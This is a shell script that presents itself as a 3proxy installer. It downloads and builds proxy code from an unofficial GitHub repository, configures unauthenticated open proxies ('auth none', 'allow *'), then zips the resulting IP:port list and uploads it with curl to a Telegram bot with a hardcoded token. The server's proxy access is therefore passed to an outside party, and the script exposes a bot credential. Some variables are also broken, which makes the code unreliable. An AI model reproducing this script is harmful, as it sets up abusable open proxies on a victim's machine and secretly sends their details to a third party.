#!/bin/sh

random() {
    tr </dev/urandom -dc A-Za-z0-9 | head -c5
    echo
}

gen64() {
    ip64() {
        echo "${array[$RANDOM % 16]}${array[$RANDOM % 16]}${array[$RANDOM % 16]}${array[$RANDOM % 16]}"
    }
    echo "$(ip64)$(ip64)$(ip64)$(ip64)"
}

install_3proxy() {
    echo "installing 3proxy"
    URL="https://raw.githubusercontent.com/quayvlog/quayvlog/main/3proxy-3proxy-0.8.6.tar.gz"
    wget -qO- $URL | bsdtar -xvf-
    cd 3proxy-3proxy-0.8.6
    make -f Makefile.Linux
    mkdir -p /usr/local/etc/3proxy/{bin,logs,stat}
    cp src/3proxy /usr/local/etc/3proxy/bin/
    cd $WORKDIR
}

gen_3proxy() {
    cat <<EOF
daemon
maxconn 1000
nscache 65536
timeouts 1 5 30 60 180 1800 15 60
flush

$(awk -F "/" '{print "auth none\n" \
"allow * \n" \
"proxy -6 -n -a -p " $4 "\n" \
"flush\n"}' ${WORKDATA})
EOF
}

gen_proxy_file() {
    cat >proxy.txt <<EOF
$(awk -F "/" '{print $3 ":" $4 }' ${WORKDATA})
EOF
}

upload_proxy() {
    local PASS=$(random)
    zip --password $PASS proxy.zip proxy.txt
    curl -F "chat_id=$5257679444" -F document=@"proxy.zip" -F "caption=Proxy is ready! Download proxy.txt file, Password for zip file: ${PASS}" "https://api.telegram.org/bot$6993056063:AAFPwvXwIaysQ4_LbBalYWz77gXwVGk8Jrc/sendDocument"
}

gen_data() {
    seq $FIRST_PORT $LAST_PORT | while read port; do
        echo "$IP4/$port/$(gen64)"
    done
}

echo "installing apps"
yum -y install gcc net-tools bsdtar zip >/dev/null
install_3proxy

echo "working folder = /home/proxy-installer"
WORKDIR="/home/proxy-installer"
WORKDATA="${WORKDIR}/data.txt"
mkdir $WORKDIR && cd $_
IP4=$(curl -4 -s icanhazip.com)
echo "Internal ip = ${IP4}"
echo "How many proxy do you want to create? Example 500"
read COUNT
FIRST_PORT=10000
LAST_PORT=$(($FIRST_PORT + $COUNT))
gen_data >$WORKDIR/data.txt
gen_3proxy >/usr/local/etc/3proxy/3proxy.cfg
gen_proxy_file
upload_proxy
